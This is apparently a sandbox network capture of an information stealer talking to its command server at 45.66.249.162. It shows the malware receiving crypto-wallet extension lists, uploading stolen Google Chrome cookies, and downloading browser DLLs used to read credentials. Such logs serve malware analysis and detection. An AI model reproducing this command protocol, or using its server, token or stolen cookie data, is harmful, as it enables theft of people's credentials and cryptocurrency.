                                                                                                                                                              Oct 11, 2024 22:32:25.054740906 CEST908INData Raw: 5a 6d 4e 6f 63 48 42 69 62 6e 42 75 61 47 52 74 62 32 35 38 4d 58 77 77 66 44 42 38 52 57 78 73 61 53 41 74 49 46 4e 31 61 53 42 58 59 57 78 73 5a 58 52 38 62 32 4e 71 5a 48 42 74 62 32 46 73 62 47 31 6e 62 57 70 69 59 6d 39 6e 5a 6d 6c 70 59 57
                                                                                                                                                              Data Ascii: ZmNocHBibnBuaGRtb258MXwwfDB8RWxsaSAtIFN1aSBXYWxsZXR8b2NqZHBtb2FsbG1nbWpiYm9nZmlpYW9mcGhiamdjaGh8MXwwfDB8VmVub20gV2FsbGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWh
                                                                                                                                                              Oct 11, 2024 22:32:25.061533928 CEST468OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJD
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 268
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 2d 2d 0d 0a
                                                                                                                                                              Data Ascii: ------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="message"fplugins------CFHIIEHJKKECGCBFIIJD--
                                                                                                                                                              Oct 11, 2024 22:32:25.525747061 CEST303INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:25 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 108
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                              Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                              Oct 11, 2024 22:32:25.553062916 CEST201OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEH
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 5547
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:25.553064108 CEST5547OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30
                                                                                                                                                              Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                              Oct 11, 2024 22:32:26.110932112 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:26 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Oct 11, 2024 22:32:26.111732006 CEST92OUTGET /55145c8889ec57f2/sqlite3.dll HTTP/1.1
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:26.575445890 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:26 GMT
                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                              Content-Length: 1106998
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 12:30:30 GMT
                                                                                                                                                              ETag: "10e436-5e7ed3ec64580"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B
                                                                                                                                                              Oct 11, 2024 22:32:26.575520039 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00
                                                                                                                                                              Data Ascii: @0B/70#N@B/81s:<R@B/92P @B
                                                                                                                                                              Oct 11, 2024 22:32:26.575561047 CEST1236INData Raw: 0a 00 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 47 f7 0a 00 83 ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed
                                                                                                                                                              Data Ascii: |$D$4$Gtu.|$\$4$|$\$4$du1Hga[^_]&+C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$r
                                                                                                                                                              Oct 11, 2024 22:32:28.563427925 CEST951OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJ
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 751
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED]
                                                                                                                                                              Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZkxpLXRRbnZpaG81aEtKWEtETmcwa1hJUG5mVGN1d1Y1cjdScWpUODkzcFdHSkY3a2xLcWxkQm9qNHJESnZ4ZkZsZ0RPQ2NXOWFLRG5VOXpJbFVoMkxQMHZPOGszdVQwZ0hKRDFKdlZBY2xrSm5Ld1pHNmhEQWw2MkhyTXhOclVlcVNSLVdGMUotbDlZWWdFCg==------GIJDGCAEBFIIECAKFHIJ--
                                                                                                                                                              Oct 11, 2024 22:32:29.061657906 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:28 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Oct 11, 2024 22:32:29.169013023 CEST563OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIID
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 363
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                              Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="file"------JKECFCFBGDHIECAAFIID--
                                                                                                                                                              Oct 11, 2024 22:32:29.648264885 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:29 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Oct 11, 2024 22:32:30.941468000 CEST563OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDB
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 363
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                              Data Ascii: ------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="file"------IDHIDBAEGIIIDHJKEGDB--
                                                                                                                                                              Oct 11, 2024 22:32:31.401715040 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:31 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Oct 11, 2024 22:32:31.890965939 CEST92OUTGET /55145c8889ec57f2/freebl3.dll HTTP/1.1
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:32.372448921 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:32 GMT
                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                              Content-Length: 685392
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                              ETag: "a7550-5e7ea271b0900"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                              Oct 11, 2024 22:32:33.678904057 CEST92OUTGET /55145c8889ec57f2/mozglue.dll HTTP/1.1
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:33.914583921 CEST92OUTGET /55145c8889ec57f2/mozglue.dll HTTP/1.1
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:34.427961111 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:34 GMT
                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                              Content-Length: 608080
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                              ETag: "94750-5e7ea271b0900"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                              Oct 11, 2024 22:32:35.550087929 CEST93OUTGET /55145c8889ec57f2/msvcp140.dll HTTP/1.1
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:36.031583071 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:35 GMT
                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                              Content-Length: 450024
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                              ETag: "6dde8-5e7ea271b0900"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                              Oct 11, 2024 22:32:37.050220013 CEST89OUTGET /55145c8889ec57f2/nss3.dll HTTP/1.1
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:37.553493023 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:37 GMT
                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                              Content-Length: 2046288
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                              ETag: "1f3950-5e7ea271b0900"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                              Oct 11, 2024 22:32:40.263899088 CEST93OUTGET /55145c8889ec57f2/softokn3.dll HTTP/1.1
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:40.731163025 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:40 GMT
                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                              Content-Length: 257872
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                              ETag: "3ef50-5e7ea271b0900"
                                                                                                                                                              Accept-Ranges: bytes
